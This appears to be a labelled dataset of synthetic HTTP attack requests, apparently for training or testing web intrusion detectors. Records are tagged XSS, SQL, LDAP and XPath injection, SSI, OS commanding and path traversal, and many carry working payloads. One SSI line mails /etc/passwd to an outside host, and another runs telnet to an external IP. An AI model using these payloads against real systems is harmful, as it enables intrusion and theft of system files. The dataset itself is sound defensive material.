Start - Id: 46890
class: XSS
PUT /r3ZzwZ@kuQmlaqjZfG/c-iJ6Sq/krlzieo9nectar/a60h0fs/drPKN/aAkZ_7xbO.jL/axe.Y9PsGO0MQ8Y0ZQ3L/AURBrjYr6SIYF.htm? HTTP/1.1
Content-Length: 132
Content-Language: eEe
Content-Encoding: gzip
Content-Location: /e4ot/chp73y.conf
Content-MD5: YnVhZm5pc2N6cnNqQzFlbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Jul 07 10:26:36 CET
Last-Modified: Sun, 29 Aug 04 24:19:36 CET
Host: www.eDeltNsis.uk
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: XeUhngg-Eek, wfEasnra-lo
Cache-Control: only-if-cached
Client-ip: 164.249.24.153
Cookie: tt=n@t eiueN;stiEonptb=FloP;Lxp_vu.divrZA=ouQ
Cookie2: $Version="07"
Date: Fri, 01 Oct 04 14:43:38 UTC
ETag: "NzR-ApOJwLt0kq3"
Expect: 100-continue
From: nbfea3@yM2KA0.biz
If-Modified-Since: Thu, 05 Feb 04 19:46:31 GMT
If-Unmodified-Since: Sun, 08 Jan 06 14:07:57 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 02 Mar 08 03:38:09 UTC
Max-Forwards: 743
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic Y2VsZ2luZTpmYW5vOUUz
Authorization: f77db aetmsn=Lobo5twv
Range: -1
Referer: /oitqf.gif
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: cBhRb (dBc3U76j)
UA-CPU: MIPS
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: tWfos/8.2 250.12.26.107, sar/1.4 111.11.79.32, 8.3 19.189.58.4
Transfer-Encoding: gzip
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------
~~~~~: ~~~~~~~~~~~

k4dg=05463&wpeeya0=hNGkWanHoCCh&neseOi5enmnorp=<bgsound    src   =    "javascript:  [alert   ('4r');]"   >

End - Id: 46890
Start - Id: 47374
class: XSS
GET /jh0attp1r6welmfnQS/tKZRO_HTPaLo/a13aK@IBAW9_3do@sAK/t70Ks-KKIGBSX1.xOZ/jAENB2AvL0m3p/cMdeSNlSRLh/09Ub-i/15XG70LPrMQ9q9-wl/lue/jvOS@P5oS4R92hdi@a8A.asmx?n1nhuta=DB&stnsEthlxh=92201451&huvnbmvengs8W=17508190&cN3=%40aicCuqoae&hxkoRnti3hniy=Mixd&VcxtermVw1idwhereJR=oeihnqMtw&mfsecgncaehgto=%3Cimg+src+++%3D%22+++++livescript%3A%5Balert++++%28%27ns%27%29%3B%5D++++%22++++%3E&fU06TyOyt=ey4lhteieut+b6t&vn8roasdx=747&IcCNJ=9J HTTP/1.1
Host: www.pNE9ta9u.cz:41
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: msPgt-rtosa;q=0.5, rlahtn-i3e4, hnhcaeI-ojOtr;q=0.2, tsadaa-t
Cache-Control: no-store
Client-ip: 61.200.67.223
Cookie: tr2eixtciyd=626116851;z74fnatusaAucA8=hsssystemstdinst7n4i9wp-isPdocument&nwindow.open;yn=t ?;zatehntri=7jtou8oaeUofa5
Cookie2: $Version="004"
Date: Wed, 24 Sep 08 12:48:13 UTC
ETag: "pjFvTSd-Lm_V@ayZ5"
Expect: oloi
From: iArw@m7oEd0Y8.fr
If-Modified-Since: Sun, 11 May 08 19:33:04 CET
If-Unmodified-Since: Sat, 06 Mar 10 12:31:08 CET
If-Match: *
If-None-Match: *
If-Range: "abnUN9N._FJgAOiCT"
Max-Forwards: 48
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: Digest qop=auth-int
Range: 35419-,75138-2674,165640-
Referer: /0eiter5e/rl2s6m/heW7tree.php3
TE: deflate,gzip;q=0.2
Trailer: Range
User-Agent: Mozilla/6.1 (Machintosh; U; Mac OS X 4.1; in-rt; rv:7.6.7) Gecko/35967833
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 605x5902
Via: 5.1 www.afOraAo.tiff, FTP/6.7 www.sRswaoe.png
Transfer-Encoding: gzip
Upgrade: vihit/6.1, e9om/9.5, eo8qd/9.3
Warning: 045 www.7ot6v.tiff:40 "9ew6nQffbtqNaolon" 
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 0450626600564347
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47374
Start - Id: 36769
class: OsCommanding
GET /ert/seclVMGcr4/yGnx2UWqHkP8/1G/fpaot/htdoogmSgeesoc2h0/lnemmlmp/eGz@vzwaZp76K/Stosock_streamJboot.iniKOinputTCuX.nsf?JPdeleteDHadminKrRscript9=%22+++%3B++telnet+++130.232.141.243+++++80+++++%3B HTTP/1.1
Host: 20.228.147.132
Connection: keep-alive
Accept: text/xml;q=0.1, video/*, application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: fepphe2=4Epasu
Client-ip: 175.79.197.116
Cookie: tZi8onu=4;egoseet5adhreas=352;rit2cur=45;5At3n=66026995
Cookie2: $Version="22"
Date: Wed, 14 Jan 04 12:55:39 GMT
ETag: "cVJDZYCIgSRT74iSj-"
Expect: eawot=sec7ek;bqrdn4n
From: hqdnlp@uehby4G.ch
If-Modified-Since: Sun, 21 Dec 08 11:21:07 UTC
If-Unmodified-Since: Fri, 30 Nov 07 05:34:13 CET
If-Match: *
If-None-Match: "d5K1A-MUBJWdku8U"
If-Range: "ataN5.wa_JozING"
Max-Forwards: 18
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic aWhvNWg6ZWZ0RGR5cg==
Authorization: Basic b25lTG5uOmFnYXNOY2g=
Range: 8-,6-50
Referer: http://eod5.st/otHit/tyoh.tiff
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/3.7 (Machintosh; U; PPC Mac OS X 7.0; fa-Ep; rv:4.5.5) Gecko/33279754
UA-CPU: 68000
UA-Disp: 944,674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 232x1783
Via: 4.9 www.9WrsisO.shtml, 3.5 241.119.84.75:34
Transfer-Encoding: gzip
Upgrade: veestt/0.4, vitr/3.3, tohkos/9.8, ypboEe/8.4, Resser/0.1
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 145.74.246.159
X-Serial-Number: 51873709956197
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36769
Start - Id: 39764
class: SSI
GET /jhereb7tjzecif/chf9oqdlaenreiesl/lVhThBau/tXDSX-4n68.php4?g0=n&rai0wunE=ctmptllzeyih9slz&stseetuet=2118954628&iqhtf=51030309&7ehtfwicUowes=asdqttq8daDOdhn&hdTRx24=%3C%21--++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E HTTP/1.0
Host: www.i3tec.biz
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251, windows-1258, iso-8859-8-i
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.5
Cache-Control: max-age=23197
Client-ip: 39.180.8.168
Cookie: seTwaq=5;5r=dear;bs=Nao;9zetcI=ndrzstyleinsert9access_logaeka
Cookie2: $Version="565"
Date: Mon, 30 Jan 06 08:07:10 UTC
ETag: W/"UOethF6tldF.k9x"
Expect: tC7a=ar57du
From: ue5Iadae@vsTB2l.net
If-Modified-Since: Sat, 19 Mar 05 08:13:23 UTC
If-Unmodified-Since: Fri, 14 Oct 05 19:19:52 UTC
If-Match: "0BJsXYjYrZUQ6TdH"
If-None-Match: "1n9kwriSyRlpJnM-_vg"
If-Range: "rA0ty3@TnAKCuwNi7"
Max-Forwards: 075
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest response="3FB8f7FE7A2B56D1Ebe41b8aaE2dea0f"
Authorization: Digest algorithm=lAezelru
Range: 42-82,601-32,-86
Referer: /a5soen/ypeaa/paaie3o/cn4ea.css
TE: deflate;q=0.2,trailers,deflate
Trailer: Trailer
User-Agent: ljYbH@E4 http://www.hejrnVei.ch
UA-CPU: 68000
UA-Disp: 3158,568,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: 1.3 www.Qrhtldw.js, 3.1 www.3agkmt.htm
Transfer-Encoding: compress
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 306032992
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39764
Start - Id: 48447
class: XPathInjection
GET /flilceSc/tv/eojffaosdtmetrhon/wBMA40.MOYH@YIg/NCKIdzhC-G/KyH1NV2HTusrztmpY/nxNbWjpkQoA/leo/94veoe/oHwbog3ez/V.betweenxtermCf.MIZCaecho8r.jsp?bt88nomane0lah=Zhrsrehibi&lqro=38328&hFnppe=telnetN&u0m3oSbcus=8201911488&solinkFcjcU81U=gpa&Le=open+&R4s=75lhxiTithEoe&sn=0706&uitpenfiawltedr=cmIr HTTP/1.0
Host: 219.172.55.89
Connection: close
Accept: video/*;q=0.9
Accept-Charset: x-mac-cyrillic;q=0.2
Accept-Encoding: gzip, compress;q=0.4, compress, gzip
Accept-Language: f-rtytrs;q=0.5, elp-a9s, bstet-vetE;q=0.5, v-eeO
Cache-Control: only-if-cached
Client-ip: 217.161.106.238
Cookie: xxwnjtsyaa=wImti' or     eoy/yyrt/child::node()[processing-instruction()=50]    or   'doermggn'=  '
Cookie2: $Version="085"
Date: Tue, 04 Mar 08 02:58:22 CET
ETag: "wD11v2K1vjaq.FUAN.l"
Expect: 100-continue
From: sSemrt@seimn8nif4.com
If-Modified-Since: Fri, 20 Apr 07 14:25:45 UTC
If-Unmodified-Since: Thu, 21 Aug 08 03:41:35 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Mar 04 15:39:47 CET
Max-Forwards: 46
MIME-Version: 9.5
Pragma: hDs2dt=t
Proxy-Authorization: NTLM MkxZYW80ZWhlb2xodWl0YW9pc29wMXNBb2x0M29udGVub1IwbmhoRVZhc2Zld2M=
Authorization: 7se2m intoj5tr=nkeente
Range: 195-,31437-
Referer: http://www.eiq7t.be/itth/1oce/oh6tssau/7oeq.jpg
TE: chunked;q=0.3,deflate;q=0.0,deflate;q=0.1
Trailer: Pragma
User-Agent: Mozilla/7.1 (Machintosh; U; PPC Mac OS X 5.2; Ei-Ca; rv:4.6.2) Gecko/70260861
UA-Disp: 5178,273,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 348x583
Via: 8.5 61.142.72.91:0195
Transfer-Encoding: amyth; euna=nbfntg
Upgrade: rtyfAi/5.9
Warning: 787 www.nspetr.htm "homtzfS" 
X-Forwarded-For: 152.33.64.46
X-Serial-Number: 30614
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48447
Start - Id: 38187
class: LdapInjection
GET /pU/09ggoEzOYk_y.cfm?psb=76%29%28%26%28objectClass%3Deios%29%28%7C%28sn%3Dsot%29%28cn%3Dnqo+++J*%29%29&seoscw=seojertHqhNp&2leuce6kdse=60&ymux=dx&st=3717 HTTP/1.0
Host: 65.76.211.79
Connection: ilJRs
Accept: */*;q=0.6
Accept-Charset: gb2312, x-mac-icelandic, windows-1253, iso-2022-jp;q=0.2, windows-1250;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: trtoteSi-he5qC;q=0.7
Cache-Control: min-fresh=42
Client-ip: 186.3.228.230
Cookie: hwcuyaoeots5= hy;hrr2enaspmsW=ty
Cookie2: $Version="7"
Date: Sat, 07 Feb 04 03:17:53 UTC
ETag: W/"cvMbx4sfux4.USQJj"
Expect: ni4g=eota
From: nethi@otsenrjp.biz
If-Modified-Since: Thu, 31 Aug 06 21:36:03 GMT
If-Unmodified-Since: Thu, 14 Jun 07 18:11:24 UTC
If-Match: "PCpCyEr4wBxZbGeJS"
If-None-Match: "rcGcf5-ncVqlFbK8"
If-Range: *
Max-Forwards: 9
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: rlgd pkAree=ohoel
Authorization: Basic b3JucTpiUkV2ZTduZA==
Range: -49,281-
Referer: /sinph/teraihm/en8e8in/h3dhlTt.msf
TE: trailers
Trailer: If-None-Match
User-Agent: ncustw (trPJ.jN4H; 5.gd80tC9.)
UA-CPU: PowerPC
UA-Disp: 747,821,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5505x7135
Via: HTTP/4.9 www.ntt4eA.jpg:06
Transfer-Encoding: deflate
Upgrade: rho/1.8, riptm/6.0
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38187
Start - Id: 42198
class: SqlInjection
GET /Xiraccept@divvy_h75libq5/4su2rc0romreL2orshjh/ifOMq3l3qu@9HrCzuQWz/sa5pto/2woLGS2UXADn40WIE8zo/smnyeRg6nO2naat/smkMr5kf.gif?.Imeta1KdX=56115124&joter1esrm=6456&Wub7libLV8=nOtyheeioi&3ieetrSrqt=bNZvqM1&f3qxw69r=65161&.BO.BQ=%27+%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F44247%2F**%2FFROM%2F**%2Fnevauesly%2F**%2FWHERE%2F**%2F%28++++%27%27+%3D+%27%2F**%2F&yuwqTutat7=mnurctgee HTTP/1.1
Host: 225.132.244.90:21
Connection: keep-alive
Accept: image/*;q=0.5
Accept-Charset: windows-1258, x-mac-ce, euc-jp
Accept-Encoding: deflate, gzip;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 139.139.72.242
Cookie: ANm9AXQBcP==S;zg8hNcil=1440139;ereGTO=dtechor@/<eiorslkb
Cookie2: $Version="304"
Date: Wed, 05 Mar 08 08:09:15 CET
ETag: W/"dHYBM.QKDh@vxmx"
Expect: r1lpdtu
From: g0Ln@OyJoc.biz
If-Modified-Since: Thu, 25 Mar 10 05:07:50 CET
If-Unmodified-Since: Sat, 07 Feb 09 24:31:16 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Oct 07 15:31:25 CET
Max-Forwards: 35
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM aWdxbGhoMGpsb3R5dHRkMWV0Ym5haXRhckFPbGlidmVuczZhdW9iWTdsbnRp
Range: 8473-303,-227666,770360-
Referer: /Mapa.dll
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.0 (Machintosh; U; PPC Mac OS X 2.3; et-vs; rv:1.7.3) Gecko/05454375
UA-CPU: StrongARM
UA-Disp: 764,0830,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 124x5537
Via: nfea/4.0 133.137.55.227
Transfer-Encoding: ryr87; al2it=arTleer
Upgrade: srir/8.4
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 52.218.75.150
X-Serial-Number: 145107
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42198
Start - Id: 41651
class: SqlInjection
GET /dkk_eGKOmWutDmTM-/HULnzDaobjectL0/hmGrFwindow.openDr4iwindow.openj/aog@bdM.uc_kPCRnN/klr1fmz/rrqoWQh-VOx/5Is7yhMafeya/u-SuWNVfh7/yergEnatselssm/hcPfeR/eibt1Mg0xX5T.Epz.shtml?5tnobxndajnhesn=nDr1perlcurt%7CL&blzNjtA=eez2i&aapsunuollprgtt=30349980&tkai=ttTstsvnsdtpn&iWecopyy6Ifunion6zE=oNdcinaENMen&gwGupdateweO1ls_Zi=88&luis=27&jpNasdIjire=qnanl&ni=%3B+select+++++*++++from+++OPENROWSET%28+%27SQLoledb%27%2C%27uid%3Dto9%3Bpwd%3Diungoolat%3BNetwork%3DDBMSSOCN%3BAddress%3D85.36.125.30%2C79534%3B%27%2C%27select+++++*++from++++0itn%27%29&fuaad=%2B%26m%3AmL%25tbt+e+spositione&.5P3KafTL=%5Cid98tCShaccept&omoods=inTn%24olhydrope&BdJEm0sdeletebGO=XrnyS HTTP/1.1
Host: www.BaIar3.st
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp, euc-jp, ks_c_5601-1987, iso-8859-8;q=0.9
Accept-Encoding: *
Accept-Language: 7tt-i
Cache-Control: no-store
Client-ip: 99.181.248.40
Cookie: xtna=g3OnhihbirNU;location7lP0de267lkx=d;i3nghnlot0ncta=76259183;adcnrege=reeoeitmaobA6dtd;yA1ar=4281
Cookie2: $Version="52"
Date: Mon, 01 Sep 08 08:58:52 CET
ETag: W/"DYrqCWSJ5vu8_ST"
Expect: tt48=sne4our
From: vlIol@haea.org
If-Modified-Since: Sun, 09 Nov 08 16:47:01 GMT
If-Unmodified-Since: Thu, 01 Feb 07 04:50:04 UTC
If-Match: "x2m-Iw.1E6Z5trfMw"
If-None-Match: *
If-Range: *
Max-Forwards: 7647
MIME-Version: 3.7
Pragma: y1nyat=Ti1be
Proxy-Authorization: NTLM bW9zbzZtbGVydGMyZXM3RW1vaXRSNGR1b2hyem51ZXY=
Authorization: NTLM czFmZHVhbW9pc281c2lyMWVyZUVoaWxhNU9ucWVsczB0TUJuOHVlbGJMaWhl
Range: -11289
Referer: http://aqtp0sn.be/6Seaii/qtoat.bin
TE: gzip;q=0.8,trailers,chunked
Trailer: Trailer
User-Agent: Mozilla/5.8 (compatible; Ielseaeiso; Unix; ue2nolef)
UA-CPU: MIPS
UA-Disp: 942,8019,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/3.0 34.238.112.46, 7.7 62.112.67.163, FTP/7.5 www.LNtocyi.tiff
Transfer-Encoding: compress
Upgrade: tzc/6.0, rs1/4.3, rie/8.9, al5/8.8
Warning: 891 153.235.102.59 "cOto1fzuiSiEocefsa" 
X-Forwarded-For: 221.42.137.170
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41651
Start - Id: 48123
class: XSS
GET /v7r1cocl/ii6qPSgwjV@0Sz/@L/xC.FtRz/TnMnnrt.gif?LJZrFFaq8BM=ao&Suiteroai5=o%40&e3o8gS9odtnt=%27iahieeaoo+b&hiQr9=%3Cstyle++++%3E%3C%21--%3C%2Fstyle%3E%3Cscript++%3E%5Balert++++%28%27D4jSC%27%29%3B%5D%2F%2F--%3E%3C%2Fscript%3E&iueoueigMesthm=240823576 HTTP/1.0
Host: www.Ertewli.st
Connection: keep-alive
Accept: image/*;q=0.8, application/x-tar;q=0.5, image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: m2smd-Ao7, eniIae-eFfoxd;q=0.3, pnnkliei-g3, p0oO-ublneiu4, ftc-noNe
Cache-Control: only-if-cached
Client-ip: 193.109.62.83
Cookie: 0NQGchild4pm_G=tt;ok=97;peoISg=260;0XUmailE1cuqinclude=dbt  I=
Cookie2: $Version="47"
Date: Mon, 15 Dec 08 17:28:24 CET
ETag: W/"MCOhL0U7dc0.h29B"
Expect: 100-continue
From: orefekI@5yo0d.be
If-Modified-Since: Mon, 09 May 05 18:11:53 GMT
If-Unmodified-Since: Thu, 21 Jun 07 06:34:24 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 17 Mar 06 08:27:47 UTC
Max-Forwards: 42
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: /tdoeqwI/asbg3ke/koams.php4
TE: deflate,trailers,trailers
Trailer: User-Agent
User-Agent: f8NIlsnW8H9S3cs
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6001x2247
Via: FTP/1.8 14.0.112.33, FTP/5.7 www.aueee4t.tiff, 1.2 108.55.125.76:8
Transfer-Encoding: deflate
Upgrade: paleei/6.9, pyefh/6.3, aeu/0.2
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 72.155.7.72
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48123
Start - Id: 39871
class: SSI
GET /n5o9ntgireiitcaooi/aWypJmX5m.dll?er=yo&eeia1a3ken=1811360&1vDyr=85206&b8b=65585483&ktiNnr=naqt0&jvi3=94&a.kdlprocessing-instruction=200059 HTTP/1.0
Host: www.eiizialC03.gov
Connection: t3de8ev
Accept: image/png;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 184.92.98.146
Cookie: ehivtnti6holeT=s4n et0W9&a
Cookie2: $Version="32"
Date: Sun, 17 Sep 06 01:52:55 UTC
ETag: "YiIMsANeiSV3D4fxFx8"
Expect: 100-continue
From: wthnun@ytfeopzfh.com
If-Modified-Since: Mon, 20 Apr 09 09:07:05 UTC
If-Unmodified-Since: Sat, 12 Feb 05 12:15:01 CET
If-Match: *
If-None-Match: "agMIhXvnB.oF1XyzW"
If-Range: *
Max-Forwards: 97
Pragma: no-cache
Proxy-Authorization: cits d39em=teheerc6
Authorization: NTLM aG41SW5pZTViYXRnYTFkNDJlZGh0cmZoc2FvZHQ2VnJyeTlsdGV6TEFtSXI4OGg=
Range: -65400,060-,233265-
Referer: http://r8tls.gov/xenaltcW/icdicsa/fl1m.bin
TE: deflate;q=0.3,deflate;q=0.8
Trailer: Trailer
User-Agent: <!--  #exec  cmd="/bin/mail  kipew.com  <     /etc/passwd"-->
UA-Disp: 4055,501,16
UA-OS: WinNT
UA-Color: color32
Via: HTTP/0.7 www.2abe.css, FTP/9.2 www.go5r3n.tiff:0823
Transfer-Encoding: compress
Upgrade: ndilra/6.2, enb/6.3
Warning: 953 www.1baesur.htm "e1bsRdaewlhUtiaO" "Wed, 15 Jul 09 03:30:45 GMT"
X-Forwarded-For: 37.56.79.152
X-Serial-Number: 43920543288578219510
----: --------------------------------------------------

null

End - Id: 39871
Start - Id: 39623
class: SSI
GET /ww2ie4h/i5.CjW-JOoymq0V.tiff?oi8ne5i7=metae9&siiiPi=zaka&hsa=asugfgroup+byheenh&uo=663&M@jiU=nE5w&1oetiaa=%3C%21--+%23include++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&470z4l=7687&wtE=6_mm&bzie=nyqJvC&xcwiF=E3sdRoC&PPqjQdze9j=processing-instruction2 HTTP/1.1
Host: 147.218.58.91:591
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.8, gzip, identity
Accept-Language: m-EnO, tUiw-s44, ternnt-siasllw;q=0.7, nrSs-ci5
Cache-Control: max-age=02
Client-ip: 79.170.36.207
Cookie: 6A@Is5gYVvari0=dx@WsS6VeE;0a4lZzGk=gaDo;OlSNobjectd=17320431;avl=oa<7;toata=ens a]jiscripthHporewiafdocument
Cookie2: $Version="78"
Date: Wed, 06 Apr 05 11:29:33 UTC
ETag: "JNM4muUx1V.zdKmp.HOl"
Expect: fTEanr
From: nneTpp@ds2o4khd.org
If-Modified-Since: Sat, 10 Nov 07 21:06:16 CET
If-Unmodified-Since: Wed, 06 Aug 08 05:59:41 UTC
If-Match: *
If-None-Match: "7_B9IoI8RT._5O8IHd3"
If-Range: Mon, 13 Dec 04 24:08:55 GMT
Max-Forwards: 72
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: t7Ca dthiOsnp=enpbG
Authorization: eaiie 8oiF=aChthh
Range: 973-,-4,32221-
Referer: /Nlorn/fILh/il6i1de/sReee3e.jsp
TE: deflate,trailers
Trailer: Accept-Language
User-Agent: ojtodCsl
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: 7.3 80.176.58.194
Transfer-Encoding: oraN
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 475 125.51.35.41 "LSrhe" 
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 661984692472
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39623
Start - Id: 36554
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 128.253.200.27
Connection: htqksml
Accept: */*;q=0.9
Accept-Charset: windows-1250;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=681
Client-ip: 131.100.188.215
Cookie: eaase3loilmrio=588;ttn=215;n6u=5rt3.7Sp1J;wxTcD=cks;VeesexgR=uneeperl O[Ic4m%t;or7y2otR=94
Cookie2: $Version="25"
Date: Wed, 18 Jan 06 09:03:29 UTC
ETag: "._sHr99T4AKY.QbUteoU"
Expect: ft7A=n8gttEd;crsu
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Sun, 12 Nov 06 19:21:23 GMT
If-Unmodified-Since: Sat, 26 Apr 08 23:56:22 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 97
MIME-Version: 5.7
Pragma: romm=ta
Proxy-Authorization: Digest nc=Ad95328B
Authorization: NTLM cmlvb2Fvb2luaGRzaGp0czdvd2xvYWhrNDR0Z2VhbGEwYXppdGk0Ym5kc2tB
Range: -7292
Referer: http://www.owvenm.net/aMuouc/o4pm4/oan3.dll
TE: deflate,gzip
Trailer: Warning
User-Agent: ratsoc (ryu47F)
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 547x5195
Via: 8.6 83.226.211.193, HTTP/4.5 253.69.13.41
Transfer-Encoding: identity
Upgrade: syjne/7.2
Warning: 384 103.114.33.177 "eR8ioli" "Sat, 15 Oct 05 19:32:06 GMT"
X-Forwarded-For: 103.73.131.132
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36554
Start - Id: 35087
class: SqlInjection
GET /Mu/h_8j1Xsr1tVbliJVL3o/hw/s6y1iUb/8noebtat/ppCtnssmenOke5/dhHxT1O/sG_hjuUv/cltoZ/m3j6hk_hhOMJCdL/mecI.png?EuelmoseRl=46&oioejneduc=kttOt%26e-m0&or7aleaoos=%3Esl&-ozMel=99628&aayaNu=Au&chhetn=71&mHsc=05 HTTP/1.1
Host: 93.252.180.34:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: A='benb'
Client-ip: 134.67.218.89
Cookie: dHaWaotaolahlsC=02279;fea28O=ia;boot.inimailrZ=25731673;QlogaV3o=dwreuO;rtisT6aeenu=lgipeaprocessing-instructiondl Rde
Cookie2: $Version="6"
Date: Sat, 26 Jul 08 21:59:12 GMT
ETag: W/"3pNi1-l_5_xe_M5Lf2Xt"
Expect: 100-continue
If-Match: *
If-Range: Mon, 12 Jun 06 24:15:13 UTC
Max-Forwards: 070
Pragma: el='mrglnie'
Proxy-Authorization: pfnBah teN5eleO=hintM
Authorization: NTLM aWZlZXJhSGxvbjRlZGxXYWhpbHRkaW10d29uOHRZY2VodWZ3Z211dGVCb2ho
Referer: /regrtth.aspx
Trailer: TE
User-Agent: ')  UNION  ALL    SELECT    ne ,     5delrrar ,   bsmSh  FROM     Npi   WHERE    oldeqs   NOT    IN  (   '4suz'  ) AND   ar7negtrxe   NOT IN     (   'rskesocwt' )   AND  '' = '
Via: 5.1 174.114.192.147, HTTP/6.7 www.ynntihoa.jpg, zya/5.7 103.209.252.191
Transfer-Encoding: gtzAa1
X-Serial-Number: 290003

null

End - Id: 35087
Start - Id: 44802
class: PathTransversal
GET /sZn5jZoTyoP6X0foWk/xP/wget-5D9.bin?ooiRmpp9eka2ye=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&sgie9nt=n HTTP/1.1
Host: 165.195.155.173:80
Connection: close
Accept: */*
Accept-Charset: euc-kr;q=0.0
Accept-Encoding: gzip;q=0.5
Accept-Language: *;q=0.9
Cache-Control: hr=aa
Client-ip: 197.105.10.211
Cookie: xSaanohherrct=2;9noctztmaL=e6-o;HoD8andtB=3;th=rnc;sMiP6BDsSL=eMt
Cookie2: $Version="8"
Date: Mon, 04 Jul 05 13:33:27 UTC
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 100-continue
From: srwYoiR5@1klnww.fr
If-Modified-Since: Sat, 28 Apr 07 10:41:19 CET
If-Unmodified-Since: Wed, 02 Apr 08 21:37:59 UTC
If-Match: "smgY2HBXv1S8bJS1NRj"
If-None-Match: *
If-Range: Mon, 13 Jul 09 12:38:18 UTC
Max-Forwards: 360
MIME-Version: 7.4
Pragma: 7erira=rnd
Proxy-Authorization: Digest qop=auth
Authorization: Basic c2FpYTptdGExUmxv
Range: -83
Referer: http://t0lui.gov/e6i9eq6.pdf
